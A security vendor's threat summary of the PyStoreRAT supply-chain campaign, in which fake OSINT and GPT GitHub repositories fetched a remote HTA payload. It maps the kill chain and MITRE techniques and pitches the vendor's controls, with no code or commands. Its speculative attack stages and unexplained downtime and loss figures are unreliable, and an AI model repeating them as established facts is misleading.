Fake OSINT and GPT GitHub Repos Used to Spread PyStoreRAT in Supply Chain Attack
Executive Summary
In late 2025, cybersecurity researchers uncovered a supply chain attack involving malicious repositories on GitHub impersonating open-source Python utilities themed around OSINT and GPT automation. These repos covertly delivered a previously unseen JavaScript-based Remote Access Trojan dubbed PyStoreRAT, using minimal code to retrieve and execute a remote HTA file. Unsuspecting developers and security professionals, lured by the project's legitimate appearance, risked compromise when cloning or running the code, resulting in unauthorized remote access and potential data exfiltration. The campaign highlights the growing sophistication of attacks abusing trusted developer platforms and open-source supply chains.
This incident underscores the urgent need for organizations to audit third-party code sources, bolster code supply chain security, and monitor for emerging malware targeting developer ecosystems. The tactic reflects broader trends in social engineering, weaponized open-source projects, and the exploitation of generative AI themes by threat actors.
Why This Matters Now
The prevalence of fake utility repositories delivering advanced RATs raises the urgency for organizations and developers to reassess the security of their software supply chains. As trust in open-source code is exploited by attackers, unchecked adoption of tools advertised as helpful or AI-powered greatly increases the risk of malware infiltration and data breaches.
Attack Path Analysis
Attackers leveraged fake OSINT and GPT-themed GitHub repositories to lure victims into executing a malicious Python script, initiating the download and execution of a remote HTA file (Initial Compromise). Once foothold was established, the PyStoreRAT payload enabled further code execution, potentially allowing privilege escalation through credential theft or abuse of user rights (Privilege Escalation). The RAT's presence allowed movement across cloud or containerized environments, targeting additional internal systems (Lateral Movement). The infected host connected to a remote command and control server, facilitating persistent attacker communications (Command & Control). Collected data or credentials were exfiltrated via outbound traffic under attacker control (Exfiltration). Finally, attackers retained persistent access, which could be used for additional payloads, ransomware, or further disruptive actions (Impact).
Kill Chain Progression
Initial Compromise
Description
Victims cloned/downloaded malicious Python repositories from GitHub, which executed scripts to silently download and launch a remote HTA file, installing PyStoreRAT.
MITRE ATT&CK® Techniques
Supply Chain Compromise
Drive-by Compromise
Command and Scripting Interpreter: JavaScript
Ingress Tool Transfer
User Execution: Malicious Link
Shared Modules
Phishing: Spearphishing Link
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Change and Software Development Management
Control ID: 6.2.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management
Control ID: Article 16
CISA Zero Trust Maturity Model 2.0 – Software Supply Chain Security
Control ID: Asset Management - Software Supply Chain
NIS2 Directive – Supply Chain Security for Essential and Important Entities
Control ID: Article 21(2)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
High risk from fake GitHub repositories targeting developers with PyStoreRAT malware disguised as OSINT and GPT utilities, compromising development environments.
Information Technology/IT
Critical exposure through supply chain attacks on development tools and repositories, requiring enhanced egress security and threat detection capabilities.
Computer/Network Security
Direct targeting through malicious OSINT tools affecting security professionals, necessitating zero trust segmentation and anomaly detection for protection.
Government Administration
Significant vulnerability as OSINT tools are widely used for intelligence gathering, requiring strict policy enforcement and encrypted traffic monitoring.
Sources
- Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloadshttps://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.htmlVerified
- PyStoreRAT: A New AI-Driven Supply Chain Malware Campaign Targeting IT & OSINT Professionalshttps://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/Verified
- PyStoreRAT Malware Campaign: Fake OSINT and GPT GitHub Repositories Target Security Researchers and Cryptocurrency Usershttps://www.rescana.com/post/pystorerat-malware-campaign-fake-osint-and-gpt-github-repositories-target-security-researchers-andVerified
- Warning to Developers: New 'PyStoreRAT' Malware Campaign Disguised as OSINT and GPT Tools on GitHubhttps://www.thaicert.or.th/en/2025/12/15/warning-to-developers-new-pystorerat-malware-campaign-disguised-as-osint-and-gpt-tools-on-github/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust network segmentation, egress policy enforcement, east-west traffic controls, and integrated anomaly detection would have significantly limited the spread and impact of PyStoreRAT at multiple stages—detecting the initial compromise, blocking lateral movement, and containing data exfiltration to external control servers.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Real-time inspection of inline traffic identifies and blocks weaponized downloads.
Control: Zero Trust Segmentation
Mitigation: Network segmentation limits visibility and access to privileged resources.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized internal communication and flags anomalous movement.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound connections to known or suspicious command servers are detected and blocked.
Control: Cloud Firewall (ACF)
Mitigation: Outbound exfiltration attempts are blocked and alerted on.
Rapid detection of post-compromise activity and containment of malicious behavior.
Impact at a Glance
Affected Business Functions
- Software Development
- Cybersecurity Analysis
- Cryptocurrency Transactions
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive data, including credentials, financial information, and intellectual property, due to the deployment of information-stealing malware like Rhadamanthys.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust segmentation and identity-based access controls to restrict workload communication and lateral movement.
- • Enforce strict egress security policies with real-time domain and threat intelligence filtering to block outbound connections to malicious destinations.
- • Deploy distributed inline traffic inspection (CNSF) to detect and block malicious downloads and anomalous behaviors in real time.
- • Monitor east-west traffic and implement microsegmentation to confine potential threats to their initial entry point.
- • Integrate automated anomaly detection, logging, and incident response to rapidly identify and contain post-compromise activity.
